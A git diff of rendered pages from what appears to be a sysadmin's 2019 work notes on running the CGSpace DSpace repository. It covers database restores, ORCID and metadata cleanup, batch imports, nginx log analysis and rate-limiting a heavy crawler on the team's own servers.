    +2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.DIMDisseminationCrosswalk", name="dim"
     
    • I restarted Tomcat and the item views came back, but then the Solr statistics cores didn’t all load properly
        @@ -326,9 +326,9 @@ dspace.log.2019-09-15:808 # docker run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-08-31.backup -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
    • Elizabeth from CIAT sent me a list of sixteen authors who need to have their ORCID identifiers tagged with their publications @@ -339,26 +339,26 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
    dc.contributor.author,cg.creator.id
    -"Kihara, Job","Job Kihara: 0000-0002-4394-9553"
    -"Twyman, Jennifer","Jennifer Twyman: 0000-0002-8581-5668"
    -"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
    -"Arango, Jacobo","Jacobo Arango: 0000-0002-4828-9398"
    -"Chavarriaga Aguirre, Paul","Paul Chavarriaga-Aguirre: 0000-0001-7579-3250"
    -"Paul, Birthe","Birthe Paul: 0000-0002-5994-5354"
    -"Eitzinger, Anton","Anton Eitzinger: 0000-0001-7317-3381"
    -"Hoek, Rein van der","Rein van der Hoek: 0000-0003-4528-7669"
    -"Aranzales Rondón, Ericson","Ericson Aranzales Rondon: 0000-0001-7487-9909"
    -"Staiger-Rivas, Simone","Simone Staiger: 0000-0002-3539-0817"
    -"de Haan, Stef","Stef de Haan: 0000-0001-8690-1886"
    -"Pulleman, Mirjam","Mirjam Pulleman: 0000-0001-9950-0176"
    -"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
    -"Tamene, Lulseged","Lulseged Tamene: 0000-0002-3806-8890"
    -"Andrieu, Nadine","Nadine Andrieu: 0000-0001-9558-9302"
    -"Ramírez-Villegas, Julián","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    +"Kihara, Job","Job Kihara: 0000-0002-4394-9553"
    +"Twyman, Jennifer","Jennifer Twyman: 0000-0002-8581-5668"
    +"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
    +"Arango, Jacobo","Jacobo Arango: 0000-0002-4828-9398"
    +"Chavarriaga Aguirre, Paul","Paul Chavarriaga-Aguirre: 0000-0001-7579-3250"
    +"Paul, Birthe","Birthe Paul: 0000-0002-5994-5354"
    +"Eitzinger, Anton","Anton Eitzinger: 0000-0001-7317-3381"
    +"Hoek, Rein van der","Rein van der Hoek: 0000-0003-4528-7669"
    +"Aranzales Rondón, Ericson","Ericson Aranzales Rondon: 0000-0001-7487-9909"
    +"Staiger-Rivas, Simone","Simone Staiger: 0000-0002-3539-0817"
    +"de Haan, Stef","Stef de Haan: 0000-0001-8690-1886"
    +"Pulleman, Mirjam","Mirjam Pulleman: 0000-0001-9950-0176"
    +"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
    +"Tamene, Lulseged","Lulseged Tamene: 0000-0002-3806-8890"
    +"Andrieu, Nadine","Nadine Andrieu: 0000-0001-9558-9302"
    +"Ramírez-Villegas, Julián","Julian Ramirez-Villegas: 0000-0002-8044-583X"
     
    • I tested the file on my local development machine with the following invocation:
    -
    $ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
     
    • In my test environment this added 390 ORCID identifiers
    • I ran the same updates on CGSpace and DSpace Test and then started a Discovery re-index to force the search index to update
    • @@ -386,11 +386,11 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
    • Follow up with Marissa again about the CCAFS phase II project tags
    • Generate a list of the top 1500 authors on CGSpace:
    -
    dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
    +
    dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
     
    • Then I used csvcut to select the column of author names, strip the header and quote characters, and saved the sorted file:
    -
    $ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/"//g' | sort > dspace/config/controlled-vocabularies/dc-contributor-author.xml
    +
    $ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/"//g' | sort > dspace/config/controlled-vocabularies/dc-contributor-author.xml
     
    • After adding the XML formatting back to the file I formatted it using XML tidy:
    @@ -416,7 +416,7 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s -
    $ perl-rename -n 's/_{2,3}/_/g' *.pdf
    +
    $ perl-rename -n 's/_{2,3}/_/g' *.pdf
     
    • I was preparing to run SAFBuilder for the Bioversity migration and decided to check the list of PDFs on my local machine versus on DSpace Test (where I had downloaded them last month)
        @@ -426,25 +426,25 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
    -
    $ rename -v 's/___/_/g'  *.pdf
    -$ rename -v 's/__/_/g'  *.pdf
    +
    $ rename -v 's/___/_/g'  *.pdf
    +$ rename -v 's/__/_/g'  *.pdf
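A Python sketch of the same renaming logic, written as a dry run that only reports what would change. The function names and file names are hypothetical. It collapses any run of two or more underscores in one pass, rather than handling triple and double underscores separately.

```python
import re


def collapse_underscores(filename):
    """Replace every run of two or more underscores with a single one."""
    return re.sub(r"_{2,}", "_", filename)


def plan_renames(filenames):
    """Return (old, new) pairs for the names that would actually change."""
    plan = []
    for name in filenames:
        new_name = collapse_underscores(name)
        if new_name != name:
            plan.append((name, new_name))
    return plan


# Hypothetical file names.
for old, new in plan_renames(["Annual___Report__2010.pdf", "clean_name.pdf"]):
    print(f"{old} -> {new}")
```

Applying the plan would then be a matter of passing each pair to `os.rename`, after checking that no two files collapse to the same name.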
     
    • I’m still waiting to hear what Carol and Francesca want to do with the 1195.pdf.LCK file (for now I’ve removed it from the CSV, but for future reference it has the number 630 in its permalink)
    • I wrote two fairly long GREL expressions to clean up the institutional author names in the dc.contributor.author and dc.identifier.citation fields using OpenRefine
        -
      • The first targets acronyms in parentheses like “International Livestock Research Institute (ILRI)":
      • +
      • The first targets acronyms in parentheses like “International Livestock Research Institute (ILRI)”:
    -
    value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,"")
    +
    value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,"")
     
    • The second targets cities and countries after names like “International Livestock Research Institute, Kenya”:
    -
    replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,"")
    +
    replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,"")
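To try the two expressions outside OpenRefine, here is a minimal Python sketch. It uses a shortened, hypothetical subset of the acronym and place lists, and it assumes the acronym pattern is applied before the place pattern.

```python
import re

# Shortened, illustrative subsets of the lists in the GREL expressions above.
ACRONYMS = ["ILRI", "CIAT", "FAO", "IPGRI", "Italy", "Kenya"]
PLACES = ["Kenya", "Nairobi", "Rome", "New Delhi"]

ACRONYM_PATTERN = re.compile(
    r",? ?\((" + "|".join(re.escape(a) for a in ACRONYMS) + r")\)"
)
PLACE_PATTERN = re.compile(
    r",? ?(" + "|".join(re.escape(p) for p in PLACES) + r")"
)


def clean_institution(name):
    """Strip parenthesised acronyms, then trailing city or country names."""
    return PLACE_PATTERN.sub("", ACRONYM_PATTERN.sub("", name))


print(clean_institution("International Livestock Research Institute (ILRI)"))
print(clean_institution("International Livestock Research Institute, Kenya"))
```

Because the place pattern is not anchored to the end of the string, it also removes a place name in the middle of a value (for example "University of Nairobi" would lose "Nairobi"), so the results need a manual review.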
     
    • I imported the 1,427 Bioversity records with bitstreams to a new collection called 2019-09-20 Bioversity Migration Test on DSpace Test (after splitting them in two batches of about 700 each):
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
     $ dspace import -a -e me@cgiar.org -m 2019-09-20-bioversity1.map -s /home/aorth/Bioversity/bioversity1
     $ dspace import -a -e me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bioversity/bioversity2
     
      @@ -513,7 +513,7 @@ $ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bio
    • Get a list of institutions from CCAFS’s Clarisa API and try to parse it with jq, do some small cleanups and add a header in sed, and then pass it through csvcut to add line numbers:
    -
    $ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
    +
    $ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
     $ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv -u
     
    • The csv-metadata-quality tool caught a few records with excessive spacing and unnecessary Unicode
    diff --git a/docs/2019-10/index.html b/docs/2019-10/index.html
    index d0406e12f..0f8043cb6 100644
    --- a/docs/2019-10/index.html
    +++ b/docs/2019-10/index.html
    @@ -18,7 +18,7 @@
    -
    +
    @@ -113,7 +113,7 @@
    -
    $ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv > /tmp/iwmi-title-region-subregion-river.csv
    +
    $ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv > /tmp/iwmi-title-region-subregion-river.csv
     
    • Then I replace them in vim with :% s/\%u00a0/ /g because I can’t figure out the correct sed syntax to do it directly from the pipe above
    • I uploaded those to CGSpace and then re-exported the metadata
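For the non-breaking space replacement mentioned above, one possible way to do it in the pipe is sketched below. It assumes the CSV is UTF-8 encoded (so U+00A0 is the byte pair 0xC2 0xA0); the `replace_nbsp` helper name is hypothetical and not part of any script referenced here.

```shell
#!/bin/sh
# Assumption: the input is UTF-8, where U+00A0 is the two bytes 0xC2 0xA0.
# Building the bytes with printf avoids relying on sed-specific \x or \u escapes.
nbsp=$(printf '\302\240')

# Hypothetical helper: read stdin and replace every non-breaking space
# with a regular space.
replace_nbsp() {
    sed "s/${nbsp}/ /g"
}

# Example: a title containing a non-breaking space between two words
printf 'Water%sManagement\n' "$nbsp" | replace_nbsp
```

In a pipeline this would sit after `csvcut`, before the output redirection.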
    • @@ -121,7 +121,7 @@
    • I modified the script so it replaces the non-breaking spaces instead of removing them
    • Then I ran the csv-metadata-quality script to do some general cleanups (though I temporarily commented out the whitespace fixes because it was too many thousands of rows):
    -
    $ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
    +
    $ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
     
    • That fixed 153 items (unnecessary Unicode, duplicates, comma–space fixes, etc)
    • Release version 0.3.1 of the csv-metadata-quality script with the non-breaking spaces change
    • @@ -134,7 +134,7 @@
      • Create an account for Bioversity’s ICT consultant Francesco on DSpace Test:
      -
      $ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
      +
      $ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
       
      • Email Francesca and Carol to ask for follow up about the test upload I did on 2019-09-21
          @@ -193,20 +193,20 @@
      -
      $ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
      +
      $ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
       

      2019-10-11

      • I ran the DSpace cleanup function on CGSpace and it found some errors:
      $ dspace cleanup -v
       ...
      -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      -  Detail: Key (bitstream_id)=(171221) is still referenced from table "bundle".
      +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      +  Detail: Key (bitstream_id)=(171221) is still referenced from table "bundle".
       
      • The solution, as always, is (repeat as many times as needed):
      # su - postgres
      -$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
      +$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
       UPDATE 1
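Since this fix has to be repeated for each offending bitstream, the ID could be pulled out of the error text rather than copied by hand. This is only a sketch: `extract_bitstream_id` is a hypothetical helper, and it only prints the SQL statement instead of running it.

```shell
#!/bin/sh
# Hypothetical helper: print the bitstream ID from a "Detail: Key (...)" line
# read on stdin. Prints nothing if the line does not match.
extract_bitstream_id() {
    sed -n 's/.*Key (bitstream_id)=(\([0-9][0-9]*\)).*/\1/p'
}

# Example using the error detail shown above
msg='  Detail: Key (bitstream_id)=(171221) is still referenced from table "bundle".'
id=$(printf '%s\n' "$msg" | extract_bitstream_id)

# Print (not execute) the statement that would clear the reference
printf 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (%s);\n' "$id"
```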
       

      2019-10-12

        @@ -229,12 +229,12 @@ International Centre for Tropical Agriculture,International Center for Tropical
       International Maize and Wheat Improvement Center (CIMMYT),International Maize and Wheat Improvement Center
       International Centre for Agricultural Research in the Dry Areas,International Center for Agricultural Research in the Dry Areas
       International Maize and Wheat Improvement Centre,International Maize and Wheat Improvement Center
      -"Agricultural Information Resource Centre, Kenya.","Agricultural Information Resource Centre, Kenya"
      -"Centre for Livestock and Agricultural Development, Cambodia","Centre for Livestock and Agriculture Development, Cambodia"
      +"Agricultural Information Resource Centre, Kenya.","Agricultural Information Resource Centre, Kenya"
      +"Centre for Livestock and Agricultural Development, Cambodia","Centre for Livestock and Agriculture Development, Cambodia"
      • Then I applied it with my fix-metadata-values.py script on CGSpace:
      -
      $ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
      +
      $ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
       
      • I did some manual curation of about 300 authors in OpenRefine in preparation for telling Peter and Abenet that the migration is almost ready
          @@ -270,7 +270,7 @@ real 82m35.993s
      • I looked in the database to find authors that had “|” in them:
      -
      dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
      +
      dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
                   text_value            | resource_id 
       ----------------------------------+-------------
        Anandajayasekeram, P.|Puskur, R. |         157
      @@ -280,7 +280,7 @@ real    82m35.993s
       
      • Then I found their handles and corrected them, for example:
      -
      dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
      +
      dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
         handle   
       -----------
        10568/129
      @@ -304,10 +304,10 @@ real    82m35.993s
       
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
     $ mkdir 2019-10-15-Bioversity
     $ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-10-15-Bioversity
    -$ sed -i '/<dcvalue element="identifier" qualifier="uri">/d' 2019-10-15-Bioversity/*/dublin_core.xml
    +$ sed -i '/<dcvalue element="identifier" qualifier="uri">/d' 2019-10-15-Bioversity/*/dublin_core.xml
     
    • It’s really stupid, but for some reason the handles are included even though I specified the -m option, so after the export I removed the dc.identifier.uri metadata values from the items
    • Then I imported a test subset of them in my local test environment:
    • @@ -317,7 +317,7 @@ $ sed -i '/<dcvalue element="identifier" qualifier="uri"&
    • I had forgotten (again) that the dspace export command doesn’t preserve collection ownership or mappings, so I will have to create a temporary collection on CGSpace to import these to, then do the mappings again after import…
    • On CGSpace I will increase the RAM of the command line Java process for good luck before import…
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s 2019-10-15-Bioversity
     
    • After importing the 1,367 items I re-exported the metadata, changed the owning collections to those based on their type, then re-imported them
    diff --git a/docs/2019-11/index.html b/docs/2019-11/index.html
    index 7ee04a2e2..70a86b88e 100644
    --- a/docs/2019-11/index.html
    +++ b/docs/2019-11/index.html
    @@ -15,17 +15,17 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
    -# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
    +# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
     4671942
    -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
    +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
     1277694
     So 4.6 million from XMLUI and another 1.2 million from API requests
     Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
    -# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
    +# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
     1183456
    -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
    +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
     106781
     " />
    @@ -45,20 +45,20 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
    -# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
    +# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
     4671942
    -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
    +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
     1277694
     So 4.6 million from XMLUI and another 1.2 million from API requests
     Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
    -# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
    +# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
     1183456
    -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
    +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
     106781
     "/>
    -
    +
    @@ -152,22 +152,22 @@ Let’s see how many of the REST API requests were for bitstreams (because t
    -
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
    +
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
     4671942
    -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
    +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
     1277694
     
    • So 4.6 million from XMLUI and another 1.2 million from API requests
    • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
    -
    # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
    +
    # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
     1183456 
    -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
    +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
     106781
     
    • The types of requests in the access logs are (by lazily extracting the sixth field in the nginx log)
    -
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | awk '{print $6}' | sed 's/"//' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | awk '{print $6}' | sed 's/"//' | sort | uniq -c | sort -n
           1 PUT
           8 PROPFIND
         283 OPTIONS
    @@ -177,7 +177,7 @@ Let’s see how many of the REST API requests were for bitstreams (because t
     
    • Two very active IPs are 34.224.4.16 and 34.234.204.152, which made over 360,000 requests in October:
    -
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
    +
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
     365288
     
    • Their user agent is one I’ve never seen before:
    • @@ -186,22 +186,22 @@ Let’s see how many of the REST API requests were for bitstreams (because t
    • Most of them seem to be to community or collection discover and browse results pages like /handle/10568/103/discover:
    -
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -o -E "GET /(bitstream|discover|handle)" | sort | uniq -c
    +
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -o -E "GET /(bitstream|discover|handle)" | sort | uniq -c
        6566 GET /bitstream
      351928 GET /handle
    -# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c discover
    +# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c discover
     214209
    -# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c browse
    +# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c browse
     86874
     
    • As far as I can tell, none of their requests are counted in the Solr statistics:
    -
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&rows=0&wt=json&indent=true'
    +
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&rows=0&wt=json&indent=true'
     
    • Still, those requests are CPU intensive so I will add their user agent to the “badbots” rate limiting in nginx to reduce the impact on server load
    • After deploying it I checked by setting my user agent to Amazonbot and making a few requests (which were denied with HTTP 503):
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:"Amazonbot/0.1"
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:"Amazonbot/0.1"
     
    • On the topic of spiders, I have been wanting to update DSpace’s default list of spiders in config/spiders/agents, perhaps by dropping a new list in from Atmire’s COUNTER-Robots project
        @@ -210,23 +210,23 @@ Let’s see how many of the REST API requests were for bitstreams (because t
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
    -$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
    -$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"iskanie"
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
    +$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
    +$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"iskanie"
     
    • A bit later I checked Solr and found three requests from my IP with that user agent this month:
    -
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&fq=dateYearMonth%3A2019-11&rows=0'
    -<?xml version="1.0" encoding="UTF-8"?>
    +
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&fq=dateYearMonth%3A2019-11&rows=0'
    +<?xml version="1.0" encoding="UTF-8"?>
     <response>
    -<lst name="responseHeader"><int name="status">0</int><int name="QTime">1</int><lst name="params"><str name="q">ip:73.178.9.24 AND userAgent:iskanie</str><str name="fq">dateYearMonth:2019-11</str><str name="rows">0</str></lst></lst><result name="response" numFound="3" start="0"></result>
    +<lst name="responseHeader"><int name="status">0</int><int name="QTime">1</int><lst name="params"><str name="q">ip:73.178.9.24 AND userAgent:iskanie</str><str name="fq">dateYearMonth:2019-11</str><str name="rows">0</str></lst></lst><result name="response" numFound="3" start="0"></result>
     </response>
     
    • Now I want to make similar requests with a user agent that is included in DSpace’s current user agent list:
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
    -$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
    -$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"celestial"
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
    +$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
    +$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"celestial"
     
    • After twenty minutes I didn’t see any requests in Solr, so I assume they did not get logged because they matched a bot list…
